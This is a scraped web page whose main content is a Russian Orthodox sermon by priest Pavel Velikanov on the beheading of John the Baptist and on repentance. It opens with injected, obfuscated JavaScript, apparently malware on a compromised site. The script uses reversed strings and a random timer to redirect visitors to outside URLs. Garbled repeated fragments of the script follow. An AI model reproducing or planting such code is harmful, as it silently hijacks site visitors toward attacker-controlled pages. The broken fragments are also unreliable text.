$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>
Едва ли требуется пересказывать трагическую историю последних дней жизни святого пророка Иоанна Предтечи.
Евангелист оставил нам подробнейшее свидетельство о том, что происходило в дворце Ирода. Перед нашим взором – настоящий клубок страстей и придворных интриг. Здесь и ненависть Иродиады к пророку-обличителю, и снисходительный интерес пресытившегося Ирода, и бесстыдство юной Саломеи – дочери Иродиады, как это водится, перемешанное с редкостной глупостью, и материнское коварство, и пьяный дурман, затмивший разум самого царя. Одним словом, обычная светская жизнь во всей своей красе. А результат – убийство светлейшего человека, равного которому, по свидетельству Самого Христа, история еще не знала.
Апостол Иоанн Богослов прекрасно охарактеризовал это состояние упоённости миром – или, как мы сегодня сказали бы, «светскости»: «Ибо всё, что в мире: похоть плоти, похоть очей и гордость житейская, не есть от Отца, но от мира сего» (1Ин.2:16).
Иоанн Креститель с самых малых лет проявил себя как ревностный служитель Бога, бескомпромиссный в своих суждениях и поступках, сознательно ушедший в пустыню, чтобы постом и трудами утончить свою душу и сделать её чуткой к Божественному. Его радикализм проявлялся во всём: в одежде, которую не надел бы и самый последний нищий, в пище, – которой побрезговал бы даже сильно голодный человек. Не говоря уже о том, что Предтеча посмел перечить самому царю, обличать и укорять его за распутство.
Очевидно одно: Иоанн Креститель ничего и никого не боялся, кроме Бога. И эта внутренняя целостность, преданность Богу до предела не могли не привлекать к нему многих последователей и учеников. Но чего же искали люди у этого, казалось бы, совершенно никчемного с житейской точки зрения человека? И именно этот вопрос в своё время задаст Сам Христос своим ученикам.
А люди искали истины.
И эта истина была именно такой, каким был Предтеча: неудобной и колючей, словно его грубая одежда из верблюжьей шерсти.
Если спросить любого из нас, хочешь ли ты знать истину – не сомневаюсь, большинство ответит утвердительно. Но если уточнить вопрос – а хочешь ли ты знать истину о самом себе? – и процент пожелавших познать себя стремительно упадёт. Давайте признаемся: нам очень интересно, что на самом деле происходит в семье соседа или сослуживца, за что сняли нашего начальника, и многое другое – но при этом самый интересный объект нашего поля зрения – то есть мы сами – вытесняется далеко на периферию. Нам и хочется, и колется: вроде как хорошо бы знать, что мы собой представляем на самом деле – а с другой стороны, понятен страх, страх самих себя, страх увидеть собственное сердце исполненным эгоцентризма, похоти и злобы. И Бог промыслительно до времени скрывает от нас самих наше подлинное состояние. Только потому, что Ему нас очень жалко: Он не хочет, чтобы мы впали в отчаяние от зрения своих грехов и тем самым не затушили всё еще теплящуюся надежду на исцеление и спасение.
Какие счастливые мы, христиане, которым дана возможность не только сокрушаться о былых ошибках и промахах — но и получать настоящее освобождение от этих пут греха в таинствах Церкви, и прежде всего, в таинстве покаяния! Иоанн Предтеча — вот кто должен быть главным наставником каждого из нас в этом искусстве постоянного обновления и перерождения души.
Предтече Спасов Иоанне, учителю покаяния, настави нас на всякую истину!
© Настоятель храма Покрова Пресвятой Богородицы на Городне г. Москва
священник Павел Великанов.